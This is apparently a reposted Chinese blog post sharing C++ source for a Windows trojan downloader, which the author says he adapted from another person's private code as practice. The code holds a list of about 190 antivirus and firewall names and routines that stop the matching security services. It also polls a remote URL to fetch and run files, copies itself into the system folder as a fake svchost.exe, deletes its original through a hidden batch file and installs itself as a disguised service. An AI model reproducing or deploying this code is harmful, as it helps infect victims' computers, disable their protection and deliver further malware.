>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
|注意事项:如欲转载,请保留以下信息。谢谢
|文章出处:http://hi.baidu.com/_wang8
|>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
上周朋友给了一套教主的vip个人源代码,于是根据需求敲敲打打改成这样。
感叹教主的确出是同类软件中的精品。
在隐藏与保护方面还是打算从驱动来做,同时常规穿墙部分因为代码太多没
有进程注入。当作练习
// WebDown.cpp : Defines the entry point for the console application.
#include "stdafx.h"
#include "WebDown.h"
#include "winsvc.h"
#include "winsock2.h"
#pragma comment(lib,"ws2_32.lib")
#include "time.h"
#include "urlmon.h"
#pragma comment(lib,"urlmon.lib")
#include <tlhelp32.h>
/
struct MODIFY_DATA
{
char DownFile[128];//下载文件列表
int WaitTime;//巡查时间(分钟)
}modify_data =
{
"http://www.baidu.com/tmp.txt",
60,//间隔检测时间xx分钟
};
HWND hWnd;
char DownFileDate1[9]="00-00-00";
char DownFileDate2[9]="00-00-00";
SERVICE_STATUS service_status_ss;
SERVICE_STATUS_HANDLE handle_service_status;
SC_HANDLE scm,svc;
char test[128];
char AntiServ[193][18] ={
"ACKWIN32",
"ADVXDWIN",
"ALERTSVC",
"ALOGSERV",
"AMON9X",
"ANTI-TROJAN",
"ANTS",
"apvxdwin",
"ATCON",
"ATUpdateR",
"ATWATCH",
"AUTODOWN",
"AutoTrace",
"AVCONSOL",
"AVGCC32",
"AVGCTRL",
"Avgctrl",
"AVGSERV",
"AvgServ",
"AVGSERV9",
"AVGW",
"avkpop",
"AVKSERV",
"avkservice",
"avkwctl9",
"AVP32",
"AVP32",
"AVPCC",
"AVPCC",
"AVPM",
"AVPM",
"Avsched32",
"AVSYNMGR",
"AvSynMgr",
"AVWINNT",
"AVXMONITOR9X",
"AVXMONITORNT",
"AVXQUAR",
"AVXW",
"BLACKD",
"BLACKICE",
"BlackICE",
"CLAW95",
"CLAW95CF",
"CLEANER",
"CLEANER3",
"CMGRDIAN",
"CONNECTIONMONITOR",
"defscangui",
"DEFWATCH",
"DOORS",
"DVP95",
"EFPEADM",
"ETRUSTCIPE",
"EVPN",
"EXPERT",
"fameh32",
"fch32",
"fih32",
"fnrb32",
"fsaa",
"fsav32",
"fsgk32",
"fsm32",
"fsma32",
"fsmb32",
"gbmenu",
"GENERICS",
"GUARD",
"GUARDDOG",
"HELP",
"IAMAPP",
"IAMSERV",
"ICLOAD95",
"ICLOADNT",
"ICMON",
"ICSUPP95",
"ICSUPPNT",
"IFACE",
"IOMON98",
"ISRV95",
"JEDI",
"LDNETMON",
"LDPROMENU",
"LDSCAN",
"LOCKDOWN",
"LOCKDOWN2000",
"LUALL",
"LUCOMSERVER",
"MCAGENT",
"MCMNHDLR",
"MCSHIELD",
"McShield",
"MCTOOL",
"MCUpdate",
"MCVSRTE",
"MCVSSHLD",
"MGAVRTCL",
"MGAVRTE",
"MGHTML",
"minilog",
"MONITOR",
"MOOLIVE",
"MWATCH",
"NAVAP",
"navapsvc",
"NAVAPW32",
"NAVENG",
"NAVEX15",
"NAVLU32",
"NAVW32",
"NAVWNT",
"NDD32",
"NeoWatchLog",
"NETUTILS",
"ngdbserv",
"NGServer",
"NISSERV",
"NISSERV",
"NISUM",
"NISUM",
"NMAIN",
"NORMIST",
"NPROTECT",
"NPSSVC",
"NSCHED32",
"ntrtscan",
"NTVDM",
"NTXconfig",
"NVC95",
//"NVSVC32",
"NWService",
"NWTOOL16",
"PADMIN",
"pavproxy",
"PCCIOMON",
"pccntmon",
"pccwin97",
"PCCWIN98",
"pcscan",
"PERSFW",
"POP3TRAP",
"POPROXY",
"PORTMONITOR",
"PROCESSMONITOR",
"PROGRAMAUDITOR",
"PROT95",
"PVIEW95",
"RAV7",
"RAV7WIN",
"REALMON",
"RESCUE",
"RTVSCN95",
"sbserv",
"SCAN32",
"SCRSCAN",
"sharedaccess",
"SPHINX",
"SPYXX",
"SS3EDIT",
"STOPW",
"SVW3",
"SWEEP95",
"SweepNet",
"SWEEPSRV",
"SWEEPSRV.SYS",
"SweepUpdate",
"SWNETSUP",
"SymProxySvc",
"SYMTRAY",
"TFAK",
"vbcmserv",
"VbCons",
"VET32",
"VET95",
"VETTRAY",
"VPC32",
"VPTRAY",
"VSCHED",
"VSECOMR",
"VSHWIN32",
"VSMAIN",
"vsmon",
"VSMON",
//"VSSTAT",
"WATCHDOG",
"WEBSCANX",
"WGFE95",
"WIMMUN32",
"WRADMIN",
"WRCTRL",
"ZAPROMINILOG",
"ZONEALARM"
};
//====================================================================
void KillProcess(char * processName)
{
HANDLE hSnapshot;
hSnapshot=CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,0);
PROCESSENTRY32 pe;
Process32First(hSnapshot,&pe);
do
{ CString KillProcessName = processName;
if(KillProcessName.CompareNoCase(pe.szExeFile) == 0)
{
HANDLE hProcess;
hProcess=OpenProcess(PROCESS_TERMINATE,FALSE,pe.th32ProcessID);
if(hProcess)
{
TerminateProcess(hProcess,0);//关闭进程
}
}
}
while(Process32Next(hSnapshot,&pe));
CloseHandle(hSnapshot);
}
//
//终止服务
void StopServices(char * SvrName)
{
CString name = SvrName;//变量转移
SC_HANDLE scm;
SC_HANDLE service;
SERVICE_STATUS status;
if((scm=OpenSCManager(NULL,NULL,SC_MANAGER_CREATE_SERVICE))==NULL)
{
//printf("OpenSCManager Error/n");
return;
}
service=OpenService(scm,name,SERVICE_ALL_ACCESS|DELETE);
if (!service)
{
//printf("OpenService error!/n");
return;
}
BOOL isSuccess=QueryServiceStatus(service,&status);
if (!isSuccess)
{
//printf("QueryServiceStatus error!/n");
return;
}
if ( status.dwCurrentState!=SERVICE_STOPPED )
{
isSuccess=ControlService(service,SERVICE_CONTROL_STOP,&status);
//if (!isSuccess )
// printf("服务停止失败!/n");
//else
// printf("服务停止成功!/n");
Sleep( 500 );
}else
{
//printf("此服务没有运行!/n");
}
}
BOOL DisplayServices()
{
LPENUM_SERVICE_STATUS lpServices = NULL;
DWORD nSize = 0;
DWORD nServicesReturned;
DWORD nResumeHandle = 0;
DWORD dwServiceType = SERVICE_WIN32;
SC_HANDLE schSCManager = NULL;
BOOL Flag = FALSE;
DWORD i = 0;
UINT j = 0;
schSCManager = OpenSCManager(NULL, NULL, SC_MANAGER_ALL_ACCESS);
if (schSCManager == NULL) // Fail To Open SCM
{
//printf("Fail To Open SCM/n");
return FALSE;
}
lpServices = (LPENUM_SERVICE_STATUS) LocalAlloc(LPTR, 64 * 1024); // Allocate Ram
if (lpServices == NULL) // Fail To Allocate Ram
{
//printf("Fail To Allocate Ram/n");
goto CleanUP;
}
// Enum All Service Based On Service Type
if (EnumServicesStatus(schSCManager,
dwServiceType,
SERVICE_STATE_ALL,
(LPENUM_SERVICE_STATUS)lpServices,
64 * 1024,
&nSize,
&nServicesReturned,
&nResumeHandle) == NULL)
{
//printf("Fail To Enum Service/n");
goto CleanUP;
}
// Display The Services
//这里进行服务名称对比,如果是则终止
//printf("%-34s%s/n/n","ServiceName","DisplayName");
for (i = 0; i < nServicesReturned; i++)
{
//printf("%s/n",lpServices[i].lpServiceName); //从中进行匹配
for(int j = 0 ; j < 190;j++)
{
if(!_strnicmp(lpServices[i].lpServiceName,AntiServ[j],strlen(lpServices[i].lpServiceName)))
{
//printf("FindServer:%s/n",lpServices[i].lpServiceName);
if (lpServices[i].ServiceStatus.dwCurrentState == SERVICE_RUNNING)
{
//printf("STOPServer:%s/n",lpServices[i].lpServiceName);
StopServices(lpServices[i].lpServiceName);
}
}
}
}
Flag = TRUE;
// Close Service Handle,Free Allocated Ram And Return To The Caller
CleanUP:
CloseServiceHandle(schSCManager);
if (lpServices != NULL)
{
LocalFree(lpServices);
}
getchar ();
return Flag;
}
//
unsigned long CALLBACK DOWN_thread(LPVOID dParam)
{
while(1)
{
//MessageBox(NULL,"STOP SERVER","TODO",MB_OK);
///先对服务进行一次扫描检测,如果有不对的就停止。只针对WIN32
DisplayServices();
if(GetDownFileDate(modify_data.DownFile,DownFileDate2))//将要下载列表文件的时间存于Date2
{
if (strncmp(DownFileDate1,DownFileDate2,8)!=0)//下载列表时间不一样
{//表示需要下载文件
DownFiles(modify_data.DownFile);//下载文件列表中所有文件
//DownExec(modify_data.DownFile);//下载文件
strcpy(DownFileDate1,DownFileDate2);
}
}
Sleep(modify_data.WaitTime*60*1000);//分钟一次
}
return 0;
}
//***********************************************//自删除
void uninstall(void)//Thanks to Spybot
{
char batfile[MAX_PATH];
char tempdir[MAX_PATH];
char tcmdline[MAX_PATH];
char cmdline[MAX_PATH];
char This_File[MAX_PATH];
HANDLE f;
DWORD r;
PROCESS_INFORMATION pinfo;
STARTUPINFO sinfo;
GetTempPath(sizeof(tempdir), tempdir);
sprintf(batfile, "%s//rs.bat", tempdir);
f = CreateFile(batfile, GENERIC_WRITE, 0, NULL, CREATE_ALWAYS, 0, 0);
if (f != INVALID_HANDLE_VALUE)
{
WriteFile(f,"@echo off/r/n"
":kill/r/n"
"attrib -a -r -s -h /"%1/"/r/n"
"del /F /"%1/"/r/n"
"if exist /"%1/" goto kill/r/n"
"del /F /"%0/"/r/n"
,94, &r,NULL
);
CloseHandle(f);
memset(&sinfo, 0, sizeof(STARTUPINFO));
sinfo.cb = sizeof(sinfo);
sinfo.wShowWindow = SW_HIDE;
memset(This_File,0,sizeof(This_File));
GetModuleFileName(NULL, This_File, sizeof(This_File));
sprintf(tcmdline, "%%comspec%% /c %s %s", batfile, This_File); // build command line
ExpandEnvironmentStrings(tcmdline, cmdline, sizeof(cmdline)); // put the name of the command interpreter into the command line
// execute the batch file
CreateProcess(NULL, cmdline, NULL, NULL, TRUE, NORMAL_PRIORITY_CLASS | DETACHED_PROCESS, NULL, NULL, &sinfo, &pinfo);
}
}
int APIENTRY WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nCmdShow)
{
int nRetCode = 0;
///自复制----------------------
char SysDirBuff[256];
char filename[256];
char This_File[256];
::GetSystemDirectory(SysDirBuff,sizeof(SysDirBuff));
strcpy(filename,SysDirBuff);
strcat(filename,"//spool//svchost.exe");
GetModuleFileName(NULL, This_File, sizeof(This_File));
if (_stricmp(This_File,filename)!=0)
{
DeleteFile(filename);
if(::CopyFile(This_File,filename,FALSE)==0) return -1;
PROCESS_INFORMATION pinfo;
STARTUPINFO sinfo;
memset(&pinfo,0,sizeof(pinfo));
memset(&sinfo,0,sizeof(sinfo));
CreateProcess(filename,NULL, NULL, NULL,TRUE,0, NULL,SysDirBuff, &sinfo, &pinfo);
uninstall();
ExitProcess(0);
}
//注释解密部分,单元测试需要去掉,没有加密
//DecryptRecord((char*)&modify_data,sizeof(MODIFY_DATA),"4321");
//服务入口表-----------------------------------
SERVICE_TABLE_ENTRY service_tab_entry[2];
service_tab_entry[0].lpServiceName="Alerter COM+"; //线程名字
service_tab_entry[0].lpServiceProc=ServiceMain; //线程入口地址
//可以有多个线程,最后一个必须为NULL
service_tab_entry[1].lpServiceName=NULL;
service_tab_entry[1].lpServiceProc=NULL;
if (StartServiceCtrlDispatcher(service_tab_entry)==0)//首次运行
{
InstallService();
}
return nRetCode;
}
/***********************************************/